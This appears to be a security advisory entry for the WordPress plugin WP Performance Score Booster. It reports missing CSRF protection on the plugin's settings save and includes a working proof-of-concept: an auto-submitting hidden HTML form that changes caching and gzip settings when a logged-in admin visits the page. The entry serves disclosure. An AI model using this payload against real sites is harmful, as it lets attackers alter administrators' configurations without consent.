The plugin does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.
<form action="https://example.com/wp-admin/options-general.php?page=wp-performance-score-booster&tab=settings" method="post" id="csrf"> <input name="wppsb_submit_hidden" value="Y" type="hidden"> <input name="wppsb_remove_query_strings" value="on" type="hidden"> <input name="wppsb_enable_gzip" value="on" type="hidden"> <input name="wppsb_expire_caching" value="off" type="hidden"> <input name="wppsb_instant_page_preload" value="off" type="hidden"> </form><script>csrf.submit()</script>
apple502j
apple502j
Yes
2021-10-18 (about 1 years ago)
2021-10-18 (about 1 years ago)
2022-04-11 (about 1 years ago)